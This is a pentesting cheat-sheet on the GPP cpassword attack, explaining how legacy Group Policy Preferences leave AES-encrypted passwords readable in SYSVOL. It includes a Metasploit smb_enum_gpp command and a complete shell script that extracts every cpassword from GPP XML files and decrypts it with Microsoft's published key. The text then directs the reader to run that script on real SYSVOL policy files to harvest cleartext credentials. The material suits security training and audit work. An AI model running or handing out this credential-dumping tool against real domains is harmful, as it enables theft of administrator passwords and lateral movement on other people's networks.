cPassword / GPP Attack

PRACTICE ! PRACTICE ! PRACTICE !

Group Policy Preferences (GPP) let Admins create policies that carry embedded credentials, for example to set the same local administrator password on every machine in the domain

  • Those credentials are stored in the policy's XML files in SYSVOL (Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml, Printers.xml) in an attribute called "cpassword", AES-256 encrypted

  • The decryption key was published by Microsoft in the MSDN documentation, so anyone can decrypt the value :)

  • Patched in MS14-025, but the patch does not remove cpassword values that were already deployed

MS14-025 only stops the Group Policy editor from saving new passwords into preferences; it does not touch existing policies. Any legacy GPP that still contains a cpassword must be found and removed by hand, and until that happens every domain user can read it. One way to find those credz is mining SYSVOL for credential data.

SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere there is a Domain Controller (since SYSVOL is automatically synchronized and shared among all Domain Controllers).

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

We can use the Metasploit module smb_enum_gpp to find the Groups.xml (and the other GPP XML) files in SYSVOL and decrypt any cpassword they contain (the Kali tool gpp-decrypt does the same for a single value):

use auxiliary/scanner/smb/smb_enum_gpp
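If you would rather not run Metasploit against the share, the decryption is simple enough to do by hand once you have copied the XML out of SYSVOL. The script below is an added example and not part of the original page or of any tool it mentions: it pulls every cpassword attribute out of a GPP XML file and decrypts it the way gpp-decrypt does, i.e. restore the base64 padding that GPP strips, base64-decode, AES-256-CBC decrypt with the MSDN key and an all-zero IV, then convert the UTF-16LE plaintext to UTF-8. The Groups.xml content is constructed for the example; the cpassword value in it is the public test vector from the gpp-decrypt documentation, which decrypts to Local*P4ssword!.

```shell
#!/bin/sh
# Added example (not the page's code): extract and decrypt GPP cpassword values.
# Requires openssl; iconv is used if present, otherwise a NUL-stripping fallback.

# AES-256 key published by Microsoft in MSDN (MS-GPPREF "Password Encryption").
GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
# GPP uses a zero IV.
GPP_IV=00000000000000000000000000000000

# Constructed sample Groups.xml (not a real capture). The cpassword is the
# well-known test vector from the gpp-decrypt documentation.
SAMPLE_XML=$(mktemp)
trap 'rm -f "$SAMPLE_XML"' EXIT
cat > "$SAMPLE_XML" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" image="2" changed="2012-06-19 06:38:19">
    <Properties action="U" newName="" fullName="" description="Local admin pushed by GPP"
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
EOF

# Convert the UTF-16LE plaintext to UTF-8. The tr fallback only gives the
# right answer for passwords made of ASCII characters.
utf16le_to_utf8() {
    if command -v iconv >/dev/null 2>&1; then
        iconv -f UTF-16LE -t UTF-8
    else
        tr -d '\000'
    fi
}

# Decrypt one cpassword value and print the plaintext password.
gpp_decrypt() {
    cpw=$1
    # GPP strips the trailing '=' padding; put it back so base64 -d accepts it.
    while [ $(( ${#cpw} % 4 )) -ne 0 ]; do cpw="${cpw}="; done
    printf '%s' "$cpw" \
        | openssl base64 -d -A \
        | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | utf16le_to_utf8
}

# Print every cpassword attribute value found in a GPP XML file, one per line.
gpp_extract() {
    grep -o 'cpassword="[^"]*"' "$1" | sed 's/cpassword="\(.*\)"/\1/'
}

# Print "<cpassword> -> <plaintext>" for every credential in the file.
gpp_dump() {
    for cpw in $(gpp_extract "$1"); do
        printf '%s -> %s\n' "$cpw" "$(gpp_decrypt "$cpw")"
    done
}

gpp_dump "$SAMPLE_XML"
```

Point gpp_dump at each XML file you copy out of \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\ and you get the cleartext for every GPP credential still lying around. Note that an empty cpassword="" is normal and means no password was set.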
